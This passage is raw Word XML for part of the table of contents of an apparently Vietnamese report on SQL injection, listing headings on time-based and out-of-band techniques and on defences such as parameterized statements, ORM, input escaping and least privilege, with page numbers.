              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C1A5645" w14:textId="38598C72" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895609" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Time-Based</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895609 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="396C562E" w14:textId="10B9E533" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895610" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.4, Ưu điểm và nhược điểm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895610 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C32F6A2" w14:textId="52029BBA" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895611" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.Out Of Band</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895611 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A2C691D" w14:textId="23815442" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895612" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.1.Giới thiệu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895612 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34C94338" w14:textId="1F5E75D7" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895613" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2. Cơ chế hoạt động</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895613 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28249256" w14:textId="3F21D3E4" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895614" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3.2. Cách khai thác</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895614 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E0EC2AA" w14:textId="0EA43672" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895615" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Cách phòng chống SQL injection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895615 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="374EA9EF" w14:textId="359C2305" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895616" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1. Generic Protection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895616 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FD9F5D0" w14:textId="779215A0" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895617" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Parameterized Statements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895617 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47B80B0C" w14:textId="6D974EAB" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895618" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2. Object Relational Mapping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895618 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A8CA711" w14:textId="6573B38D" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895619" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.3. Escaping Input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895619 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00F243F8" w14:textId="32146B41" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895620" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.4. Sanatizing Inputs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895620 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69264042" w14:textId="13B0EF3B" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895621" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.5. Others Method</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895621 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B7C0289" w14:textId="1DFD3ACB" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895622" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Principle Of Least Privilege</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895622 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F7A2FEA" w14:textId="6A1BC7F4" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895623" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Password hashing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895623 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D8CFE72" w14:textId="79A90590" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895624" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Third Party Authentication</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895624 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
